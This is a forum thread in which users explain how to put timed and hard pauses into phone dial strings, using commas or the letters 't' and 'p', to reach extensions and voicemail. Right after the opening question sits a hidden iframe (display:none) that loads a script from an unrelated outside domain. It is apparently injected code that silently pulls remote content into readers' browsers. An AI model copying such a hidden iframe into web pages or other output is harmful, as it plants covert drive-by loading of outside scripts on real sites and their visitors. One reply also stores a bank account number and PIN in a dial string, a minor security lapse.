How can I program "pauses" and "waits"?

Is there a way to program pauses and waits for automatically dialing extensions and for automatically creating strings to retreive voicemails from other voicemail systems? I appreciate any help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

When entering the number, use a comma to pause. One comma pauses a few seconds (not sure exact time). So to dial a number and extention try 555-555-5555,,,55 (three commas pauses 3 times as long).

If you're entering the number on the "phone" portion of the phone, then you can use the menus to insert a "time pause" (the comma equivalent - a two second pause) or a "hard pause" (I don't know what the equivalent symbol is, but it's a pause that requires you to hit a key before it continues).

I've used the hard pause for things like my phone bank account, I'll do PhoneNumber(hard pause)1,3,(account number),(pin) for an easy way to get into my account.

I figured it out with the help given. To insert a 2 second wait, insert the letter "t" (you can insert multiple t's) and to insert a hard puase, insert the letter "p". Thanks again for your help.
